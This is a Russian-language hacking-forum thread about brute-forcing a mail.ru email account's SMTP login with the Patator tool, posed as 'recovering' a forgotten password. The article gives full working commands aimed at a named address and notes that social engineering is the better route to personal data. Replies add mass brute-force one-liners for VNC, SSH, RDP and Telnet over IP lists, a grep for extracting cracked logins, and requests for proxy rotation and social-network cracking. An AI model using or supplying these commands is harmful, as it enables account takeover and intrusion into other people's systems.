Статья Брутим почты с помощью Patator

ALARM
Данная статья предназначена только для ознакомительных целей с софтом.

Автор не несет никакой ответственности за неграмотных кулхацкеров

Всем доброго времени суток.

В связи с последними событиями в моей жизни , пришлось вспомнить старый добрый метод для получения доступа к почте через брут. С тем условием , что я давно не смотрел атаки данного типа , мне стало интересно , что на рынке существует кроме гидры(https://github.com/vanhauser-thc/thc-hydra.git)

Покопавшись в интернетах , я наткнулся на интересную тулзу - Patator(https://github.com/lanjelot/patator.git) На мой взгляд - это достаточно интересная и мощьная тулза , которая позволяет брутить все известные пртоколы.

Итак , теперь разберем все по пунктам отталкиваясь от задачи: Получить пароль от почты.

Первый этап

Для начала нам нужно склонить саму программу.
Код:
git clone https://github.com/lanjelot/patator.git
cd patator
chmod +x ./patator.py

Второй этап

Давайте теперь попробуем запустить программу :)

./patator.py

После запуска у нас должно появиться вот такое окно:
Screenshot from 2018-02-28 03-04-26.png

Ура! Первый старт прошел успешно.

В нашем "меню" мы можем как раз таки ознакомиться о всех возможных векторах атаки , которые предоставляет нам patator.

Третий этап

Теперь давайте займемся разбором нашей задачи , на нужно реализовать smtp_login.


Давайте попробуем ввести команду:
./patator.py smtp_login

Screenshot from 2018-02-28 03-08-40.png

Ага. Теперь мы можем наблюдать еще одно меню , которое позволяет нам настроить непосредственно саму атаку так , как мы хотим.
В принципе , я думаю , что переводить флаги - нет смысла, можно догадаться , что к чему )

Итак ,теперь приступим к самому бруту.
Сразу готов сказать , что синтаксис не привычный.
Теперь добавляем дополнительные параметры к условию задачи:
email - anonqwer@bk.ru

Наконец-то!
Давайте скорее приступим к восстановлению доступа к почте)
Код:
./patator.py smtp_login host=smtp.mail.ru port=465 ssl=1 user=anonqwer@bk.ru password=FILE0 0=/home/gopher/test.txt

Screenshot from 2018-02-28 03-36-46.png


И что мы видим?!
Заветное "Authentication succeeded" !
Ура, мы вспомнили пароль :)

А теперь по порядку:

  • host - smtp сервер, где зарегистрирована наша почта (в моем случае - это маил)
  • port - порт , к которому надо коннектить (Капитан очевидность , здравствуйте )
  • ssl - принимает на вход 0 или 1 , в нашем случае мы обязаны использовать ssl
  • user - наш таргет
  • password - принимает словарь , но не путем до файла , а константой FILEn, где n - цифра , в которую мы запишем наш путь до словаря
Четвертый этап

Приводим наш вывод в оптимальный вид , а не как в этих ваших матрицах x)


Patator позволяет нам игнорировать вывод определенных ошибок с помощью дополнительного флага.
В нашем случае - у нас на неккоректные пароли всегда вылетает ошибка "Authentication failed. Please verify your account by going to "
Предлагаю убрать вывод паролей с такой ошибкой
Код:
./patator.py smtp_login host=smtp.mail.ru port=465 ssl=1 user=anonqwer@bk.ru password=FILE0 0=/home/gopher/test.txt -x ignore:fgrep='Authentication failed. Please verify your account by going to https://e.mail.ru/login?email=anonqwer@bk.ru'

Screenshot from 2018-02-28 03-47-32.png


Ура! Теперь лишняя информация (хотя она не всегда лишняя) не мусолит нам глаза


Заключение
Вот таким не хитрым способом мы смогли получить доступ к нашей забытой почте.
Не для кого не секрет , что брут почт уже устарел и чтобы пробрутить @gmail.com или @yandex.ru придется подумать несколько раз , чтобы запустить брут. Лучший вектор для получения доступа к личным данным человека - социальная инженерия.

Спасибо за внимание :)

P.S. Моя первая статья , не ругайтесь сильно. Если есть дополнения или замечния, буду признателен услышать их.
 
Последнее редактирование:
==============
VNC
patator vnc_login host=FILE0 0=/root/IP.txt password=password port=5901 -t 1000 -l /root/rez/ -x ignore:code=1 -x ignore:fgrep='Authentication failure' -x ignore:code=2
==============
SSH
patator ssh_login host=FILE0 user=admin password=admin 0=/root/IP.txt -t 1000 -l /root/rez -x ignore:code=1 -x ignore:mesg='Authentication failed.'
==============
RDP
patator rdp_login host=FILE0 user=FILE1 password=FILE2 0=/root/ip.txt 1=/root/Logins.txt 3=/root/passwords.txt -x ignore:fgrep='exit status 1'
==============
TELNET
telnet_login host=FILE2 2=/root/IPs.txt inputs='FILE0\nFILE1' 0=/root/logins.txt 1=passwords.txt -t 1000 -l /root/rez/ prompt_re='Username:|Password:' -x ignore:egrep='Login incorrect.+Username:' -x ignore:code='37' -x ignore:code='38' -x ignore:code='49' -x ignore:egrep='nLogin incorrect' -x ignore:code='51'
=================================================================================
если порты отличаются от дефолта прописываем как в пример с vnc
rez - папка с логом

По окончанию работы потом нужно распарить файл с логом там будут результаты INFO это гуды
вот составил регулярку для grep

grep -Eo "INFO.+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" /rez/RESULTS.xml

p.s - для брута почт нужны прокси качественные.
Пробовал брутить RDP этой утилитой?
Какие результаты были удачно или не ахти ?
 
Не знал про такое. И не совсем понял механизм пока что ) сейчас гляну , спасибо
а как прокси лист сюда прикрутить или прокси по ссылке с указанием попыток для одной прокси?
 
Последнее редактирование:
А команды для социалок вк,ок,инста,fb, знает кто нибудь?
 
Как остановить patator (http_fuzz) когда найден пароль?
У меня сейчас стоит -x ignore:fgrep='Error'\ Все работает хорошо, но оно нашло пароль и дальше проверяет все остальные из словаря, а я хочу что бы он остановился.
Пробовал free, quit тогда вообще что попало выдает, возможно я не правильно их использовал?
 
жив ещё инструмент?

мэйл ру сейчас пробовал по инструкции:
Код:
patator smtp_login host=smtp.mail.ru port=465 ssl=1 user=my_mail@mail.ru password=FILE0 0=/root/Desktop/target.txt

пишет вот такую ошибку:
Код:
<class 'ValueError'> server_hostname cannot be an empty string or start with a leading dot.

Из текста ошибки понятно что пататор ругается на то что якобы hostname пуст или начинается с точки... Но это же не так!
Пробовал указать хост так:
Код:
host=smtp://smtp.mail.ru
(помнится в hydra так указывал и оно там работало)

но тоже ошибка:
Код:
<class 'socket.gaierror'> [Errno -2] Name or service not known

РЕШЕНО!!!
даже стыдно как-то стало ))) надо было не встроенным из коробки пататором брутить, а скачать обновленный с гитхаба.

github PATATOR
 
Последнее редактирование:
жив ещё инструмент?

мэйл ру сейчас пробовал по инструкции:
Код:
patator smtp_login host=smtp.mail.ru port=465 ssl=1 user=my_mail@mail.ru password=FILE0 0=/root/Desktop/target.txt

пишет вот такую ошибку:
Код:
<class 'ValueError'> server_hostname cannot be an empty string or start with a leading dot.

Из текста ошибки понятно что пататор ругается на то что якобы hostname пуст или начинается с точки... Но это же не так!
Пробовал указать хост так:
Код:
host=smtp://smtp.mail.ru
(помнится в hydra так указывал и оно там работало)

но тоже ошибка:
Код:
<class 'socket.gaierror'> [Errno -2] Name or service not known

РЕШЕНО!!!
даже стыдно как-то стало ))) надо было не встроенным из коробки пататором брутить, а скачать обновленный с гитхаба.

github PATATOR

У меня что-то даже с GIT не работает...
 
На github есть версия ПОТАТОРА на винде, а как там к примеру брутить VNC ? Есть примерчик комманд?
 
Аналогично.
При попытке брутить smtp получаю следующую ошибку "<class 'ValueError'> server_hostname cannot be an empty string or start with a leading dot".
Может кто знает что сделать?

root@kali:~# cd patator
root@kali:~/patator# python patator.py далее ваша цель smtp_login host=smtp.mail.ru port=465 ssl=1 user=my_mail@mail.ru password=FILE0 0=/root/Desktop/target.txt
 
Ключевое слово, что метод устарел и с большой вероятностью ничего не получится. Но спасибо, стоит попробовать на @rambler.ru
 
А как правильно предоставить список портов, если хитрые админы на ssh много нестандарта повесили?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!